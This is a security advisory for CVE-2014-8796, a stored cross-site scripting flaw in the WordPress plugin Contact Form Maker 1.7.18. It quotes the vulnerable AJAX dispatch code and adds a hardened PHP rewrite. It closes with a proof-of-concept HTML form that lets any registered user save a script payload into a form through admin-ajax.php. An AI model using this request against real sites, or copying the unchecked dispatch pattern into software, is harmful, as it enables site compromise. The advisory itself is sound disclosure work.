Contact Form Maker 1.7.18 XSS

Homepage:

https://wordpress.org/support/plugin/contact-form-maker

CVE-ID

CVE-2014-8796

CVSS Score

3.5

CVSS Vector

(AV:N/AC:M/Au:S/C:P/I:N/A:N)

Description:

form_maker_cfm() is reachable by every registered user (an account created through wp-login.php?action=register is enough) because it is hooked with add_action('wp_ajax_get_stats_fmc', 'form_maker_cfm'), and wp_ajax_* actions are dispatched for any logged-in user without a capability check of their own.

Through this function the /admin/controllers/FMControllerManage_fmc.php controller class, which is responsible for plugin management, can be included and executed.

Any plugin form can therefore be edited via wp-admin/admin-ajax.php and a script payload stored in it, because the output is not escaped properly.

File: contact-form-maker\contact-form-maker.php

function form_maker_cfm() {
	require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
	// $page comes straight from the request; no current_user_can() or nonce check precedes it
	$page = WDW_FMC_Library::get('page');
	if (($page != '') && (($page == 'manage_fmc') || ($page == 'submissions_fmc') || ($page == 'blocked_ips_fmc') || ($page == 'themes_fmc') || ($page == 'licensing_fmc') || ($page == 'featured_plugins_fmc') || ($page == 'uninstall_fmc') || ($page == 'formcontactwindow'))) {
		// the allow-list restricts which controller is loaded, but not who may load it
		require_once (WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst(strtolower($page)) . '.php');
		$controller_class = 'FMController' . ucfirst(strtolower($page));
		$controller = new $controller_class();
		$controller->execute();
	}
}
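For comparison, below is a hardened version of the same dispatch pattern. This is an added example written for this page, not the plugin's own code or its vendor fix; the function name wd_fmc_ajax_dispatch(), the helper wd_fmc_page_caps(), the nonce action 'wd_fmc_manage' and the render helper are assumptions for illustration. It addresses both findings above: the missing authorization on the wp_ajax_* hook, and the unescaped output of stored form data.

```php
<?php
// Added example (not the plugin's code): hardened AJAX dispatch for the
// controller-loading pattern above. Names are assumed for illustration.

// Allow-listed controller pages mapped to the capability each one requires.
// The original only checks that $page is in a list; it never checks the caller.
function wd_fmc_page_caps() {
    return array(
        'manage_fmc'           => 'manage_options',
        'submissions_fmc'      => 'manage_options',
        'blocked_ips_fmc'      => 'manage_options',
        'themes_fmc'           => 'manage_options',
        'licensing_fmc'        => 'manage_options',
        'featured_plugins_fmc' => 'manage_options',
        'uninstall_fmc'        => 'manage_options',
        'formcontactwindow'    => 'manage_options',
    );
}

function wd_fmc_ajax_dispatch() {
    // 1. wp_ajax_* hooks fire for any logged-in user, so the handler itself
    //    must decide who is allowed in.
    $page = isset( $_REQUEST['page'] ) ? sanitize_key( $_REQUEST['page'] ) : '';
    $caps = wd_fmc_page_caps();
    if ( ! isset( $caps[ $page ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown page' ), 400 );
    }
    if ( ! current_user_can( $caps[ $page ] ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // 2. State-changing tasks such as task=save must carry a nonce that the
    //    admin page emitted with wp_create_nonce( 'wd_fmc_manage' ); this
    //    blocks the cross-site form submission shown in the proof of concept.
    check_ajax_referer( 'wd_fmc_manage', 'nonce' );

    // 3. Build the class name only from the allow-listed key, never from the
    //    raw request value, and require the file by that fixed name.
    $controller_class = 'FMController' . ucfirst( $page );
    require_once WD_FMC_DIR . '/admin/controllers/' . $controller_class . '.php';
    $controller = new $controller_class();
    $controller->execute();
}
add_action( 'wp_ajax_get_stats_fmc', 'wd_fmc_ajax_dispatch' );

// 4. Output escaping in the view (assumed helper). Once a value such as
//    form_front has been stored it must be treated as untrusted on the way
//    out. A form builder legitimately stores HTML, so filter it through a tag
//    allow-list instead of plain text escaping; plain strings get esc_html().
function wd_fmc_render_form_front( $title, $form_front ) {
    return '<h2>' . esc_html( $title ) . '</h2>'
         . '<div class="fmc-preview">' . wp_kses_post( $form_front ) . '</div>';
}
```

wp_kses_post() strips <script> and event-handler attributes while keeping the markup a form needs; where a field is meant to hold plain text rather than HTML, esc_html() or esc_attr() is the right call instead.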

Proof of Concept:

Login as standard user.

The following request edits the form with ID=1 and stores a simple XSS payload in it:

<form method="post" action="http://wordpress-instalation/wp-admin/admin-ajax.php?action=get_stats_fmc&page=manage_fmc&task=save&current_id=1">
    <input type="text" name="form_front" value="&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;">
    <input type="submit" value="Hack!">
</form>

Timeline: